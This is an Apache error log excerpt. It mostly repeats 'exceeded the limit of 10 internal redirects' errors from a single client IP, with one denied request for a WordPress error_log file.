[Mon May 11 17:18:26.562535 2026] [core:error] [pid 1411055:tid 1411061] [client 172.190.142.176:41663] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:26.747181 2026] [core:error] [pid 1412074:tid 1412100] [client 172.190.142.176:48177] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:26.747211 2026] [core:error] [pid 1412074:tid 1412100] [client 172.190.142.176:48177] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:26.929290 2026] [core:error] [pid 1416109:tid 1416142] [client 172.190.142.176:53208] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:26.929324 2026] [core:error] [pid 1416109:tid 1416142] [client 172.190.142.176:53208] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:27.119509 2026] [core:error] [pid 1411201:tid 1411255] [client 172.190.142.176:28922] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:27.119547 2026] [core:error] [pid 1411201:tid 1411255] [client 172.190.142.176:28922] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:27.325702 2026] [core:error] [pid 1411055:tid 1411067] [client 172.190.142.176:53196] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:27.325734 2026] [core:error] [pid 1411055:tid 1411067] [client 172.190.142.176:53196] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:27.517962 2026] [core:error] [pid 1416109:tid 1416139] [client 172.190.142.176:43708] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:27.517988 2026] [core:error] [pid 1416109:tid 1416139] [client 172.190.142.176:43708] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:27.728606 2026] [core:error] [pid 1411201:tid 1411249] [client 172.190.142.176:48186] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:27.728628 2026] [core:error] [pid 1411201:tid 1411249] [client 172.190.142.176:48186] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:27.917239 2026] [core:error] [pid 1416109:tid 1416134] [client 172.190.142.176:32103] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:27.917269 2026] [core:error] [pid 1416109:tid 1416134] [client 172.190.142.176:32103] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:28.106271 2026] [core:error] [pid 1411099:tid 1411111] [client 172.190.142.176:34187] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:28.106307 2026] [core:error] [pid 1411099:tid 1411111] [client 172.190.142.176:34187] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:28.286121 2026] [core:error] [pid 1424905:tid 1424930] [client 172.190.142.176:34186] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:28.286177 2026] [core:error] [pid 1424905:tid 1424930] [client 172.190.142.176:34186] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:28.476795 2026] [core:error] [pid 1411055:tid 1411064] [client 172.190.142.176:48180] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:28.476837 2026] [core:error] [pid 1411055:tid 1411064] [client 172.190.142.176:48180] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:28.745356 2026] [core:error] [pid 1412074:tid 1412091] [client 172.190.142.176:25370] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:28.745389 2026] [core:error] [pid 1412074:tid 1412091] [client 172.190.142.176:25370] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:28.945651 2026] [core:error] [pid 1411099:tid 1411104] [client 172.190.142.176:29764] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:28.945681 2026] [core:error] [pid 1411099:tid 1411104] [client 172.190.142.176:29764] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:29.142093 2026] [core:error] [pid 1411201:tid 1411256] [client 172.190.142.176:48039] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:29.142128 2026] [core:error] [pid 1411201:tid 1411256] [client 172.190.142.176:48039] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:29.343383 2026] [core:error] [pid 1424905:tid 1424908] [client 172.190.142.176:29320] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:29.343417 2026] [core:error] [pid 1424905:tid 1424908] [client 172.190.142.176:29320] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:29.537884 2026] [core:error] [pid 1411055:tid 1411057] [client 172.190.142.176:8317] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:29.537917 2026] [core:error] [pid 1411055:tid 1411057] [client 172.190.142.176:8317] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:29.755604 2026] [core:error] [pid 1411099:tid 1411123] [client 172.190.142.176:43710] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:29.755632 2026] [core:error] [pid 1411099:tid 1411123] [client 172.190.142.176:43710] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:29.961437 2026] [core:error] [pid 1424905:tid 1424912] [client 172.190.142.176:34179] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:29.961468 2026] [core:error] [pid 1424905:tid 1424912] [client 172.190.142.176:34179] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:30.142258 2026] [core:error] [pid 1412074:tid 1412093] [client 172.190.142.176:53183] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:30.142285 2026] [core:error] [pid 1412074:tid 1412093] [client 172.190.142.176:53183] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:30.329442 2026] [core:error] [pid 1411099:tid 1411114] [client 172.190.142.176:43578] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:30.329474 2026] [core:error] [pid 1411099:tid 1411114] [client 172.190.142.176:43578] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:30.519233 2026] [core:error] [pid 1411201:tid 1411261] [client 172.190.142.176:48150] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:30.519264 2026] [core:error] [pid 1411201:tid 1411261] [client 172.190.142.176:48150] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:30.747053 2026] [core:error] [pid 1411055:tid 1411060] [client 172.190.142.176:8280] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:30.747085 2026] [core:error] [pid 1411055:tid 1411060] [client 172.190.142.176:8280] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:30.938538 2026] [core:error] [pid 1411099:tid 1411113] [client 172.190.142.176:48136] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:30.938574 2026] [core:error] [pid 1411099:tid 1411113] [client 172.190.142.176:48136] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:31.117103 2026] [core:error] [pid 1411201:tid 1411251] [client 172.190.142.176:43562] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:31.117130 2026] [core:error] [pid 1411201:tid 1411251] [client 172.190.142.176:43562] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:31.168698 2026] [authz_core:error] [pid 1411099:tid 1411110] [client 13.79.87.25:9815] AH01630: client denied by server configuration: /home/castigli/public_html/wp-includes/Requests/error_log
[Mon May 11 17:18:31.304559 2026] [core:error] [pid 1424905:tid 1424927] [client 172.190.142.176:51335] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:31.304586 2026] [core:error] [pid 1424905:tid 1424927] [client 172.190.142.176:51335] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:31.494771 2026] [core:error] [pid 1411055:tid 1411072] [client 172.190.142.176:48144] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:31.494807 2026] [core:error] [pid 1411055:tid 1411072] [client 172.190.142.176:48144] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:31.702239 2026] [core:error] [pid 1412074:tid 1412077] [client 172.190.142.176:8264] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:31.702271 2026] [core:error] [pid 1412074:tid 1412077] [client 172.190.142.176:8264] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:31.921558 2026] [core:error] [pid 1411099:tid 1411101] [client 172.190.142.176:29777] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:31.921583 2026] [core:error] [pid 1411099:tid 1411101] [client 172.190.142.176:29777] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:32.122280 2026] [core:error] [pid 1424905:tid 1424911] [client 172.190.142.176:51248] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:32.122314 2026] [core:error] [pid 1424905:tid 1424911] [client 172.190.142.176:51248] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:32.310414 2026] [core:error] [pid 1412074:tid 1412079] [client 172.190.142.176:43575] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:32.310445 2026] [core:error] [pid 1412074:tid 1412079] [client 172.190.142.176:43575] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:32.495890 2026] [core:error] [pid 1411099:tid 1411124] [client 172.190.142.176:42754] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:32.495921 2026] [core:error] [pid 1411099:tid 1411124] [client 172.190.142.176:42754] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:32.684050 2026] [core:error] [pid 1424905:tid 1424917] [client 172.190.142.176:8309] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:32.684073 2026] [core:error] [pid 1424905:tid 1424917] [client 172.190.142.176:8309] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:32.871659 2026] [core:error] [pid 1411055:tid 1411059] [client 172.190.142.176:28920] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:32.871686 2026] [core:error] [pid 1411055:tid 1411059] [client 172.190.142.176:28920] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:33.060720 2026] [core:error] [pid 1412074:tid 1412078] [client 172.190.142.176:46500] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:33.060754 2026] [core:error] [pid 1412074:tid 1412078] [client 172.190.142.176:46500] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:33.252928 2026] [core:error] [pid 1416109:tid 1416149] [client 172.190.142.176:8283] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:33.252959 2026] [core:error] [pid 1416109:tid 1416149] [client 172.190.142.176:8283] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:33.441194 2026] [core:error] [pid 1411099:tid 1411103] [client 172.190.142.176:48145] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:33.441234 2026] [core:error] [pid 1411099:tid 1411103] [client 172.190.142.176:48145] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:33.622123 2026] [core:error] [pid 1411201:tid 1411247] [client 172.190.142.176:8274] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:33.622147 2026] [core:error] [pid 1411201:tid 1411247] [client 172.190.142.176:8274] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:33.809910 2026] [core:error] [pid 1424905:tid 1424929] [client 172.190.142.176:8319] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:33.809941 2026] [core:error] [pid 1424905:tid 1424929] [client 172.190.142.176:8319] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:33.997384 2026] [core:error] [pid 1412074:tid 1412085] [client 172.190.142.176:43570] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:33.997419 2026] [core:error] [pid 1412074:tid 1412085] [client 172.190.142.176:43570] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:34.179008 2026] [core:error] [pid 1411099:tid 1411118] [client 172.190.142.176:8315] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:34.179051 2026] [core:error] [pid 1411099:tid 1411118] [client 172.190.142.176:8315] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:34.365801 2026] [core:error] [pid 1411201:tid 1411263] [client 172.190.142.176:25363] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:34.365831 2026] [core:error] [pid 1411201:tid 1411263] [client 172.190.142.176:25363] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:34.548715 2026] [core:error] [pid 1411055:tid 1411068] [client 172.190.142.176:25320] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:34.548752 2026] [core:error] [pid 1411055:tid 1411068] [client 172.190.142.176:25320] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:34.734090 2026] [core:error] [pid 1412074:tid 1412088] [client 172.190.142.176:45177] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:34.734120 2026] [core:error] [pid 1412074:tid 1412088] [client 172.190.142.176:45177] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:34.932904 2026] [core:error] [pid 1411099:tid 1411119] [client 172.190.142.176:25382] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:34.932935 2026] [core:error] [pid 1411099:tid 1411119] [client 172.190.142.176:25382] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:35.116419 2026] [core:error] [pid 1424905:tid 1424921] [client 172.190.142.176:25337] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:35.116456 2026] [core:error] [pid 1424905:tid 1424921] [client 172.190.142.176:25337] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:35.298526 2026] [core:error] [pid 1411055:tid 1411063] [client 172.190.142.176:25383] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:35.298565 2026] [core:error] [pid 1411055:tid 1411063] [client 172.190.142.176:25383] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:35.488851 2026] [core:error] [pid 1416109:tid 1416154] [client 172.190.142.176:34176] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:35.488883 2026] [core:error] [pid 1416109:tid 1416154] [client 172.190.142.176:34176] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:35.686752 2026] [core:error] [pid 1411201:tid 1411254] [client 172.190.142.176:51329] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:35.686787 2026] [core:error] [pid 1411201:tid 1411254] [client 172.190.142.176:51329] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:35.894020 2026] [core:error] [pid 1424905:tid 1424909] [client 172.190.142.176:43571] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:35.894063 2026] [core:error] [pid 1424905:tid 1424909] [client 172.190.142.176:43571] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:36.103620 2026] [core:error] [pid 1412074:tid 1412090] [client 172.190.142.176:29771] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:36.103651 2026] [core:error] [pid 1412074:tid 1412090] [client 172.190.142.176:29771] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:36.305895 2026] [core:error] [pid 1416109:tid 1416136] [client 172.190.142.176:48138] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:36.305930 2026] [core:error] [pid 1416109:tid 1416136] [client 172.190.142.176:48138] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:36.503142 2026] [core:error] [pid 1411201:tid 1411250] [client 172.190.142.176:42176] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:36.503220 2026] [core:error] [pid 1411201:tid 1411250] [client 172.190.142.176:42176] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:36.706504 2026] [core:error] [pid 1424905:tid 1424914] [client 172.190.142.176:28924] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:36.706540 2026] [core:error] [pid 1424905:tid 1424914] [client 172.190.142.176:28924] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:36.925722 2026] [core:error] [pid 1411055:tid 1411071] [client 172.190.142.176:43546] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:36.925752 2026] [core:error] [pid 1411055:tid 1411071] [client 172.190.142.176:43546] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:37.180781 2026] [core:error] [pid 1416109:tid 1416150] [client 172.190.142.176:25344] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:37.180808 2026] [core:error] [pid 1416109:tid 1416150] [client 172.190.142.176:25344] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:37.395357 2026] [core:error] [pid 1411099:tid 1411122] [client 172.190.142.176:8284] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:37.395409 2026] [core:error] [pid 1411099:tid 1411122] [client 172.190.142.176:8284] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:18:37.601881 2026] [core:error] [pid 1411201:tid 1411268] [client 172.190.142.176:34181] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
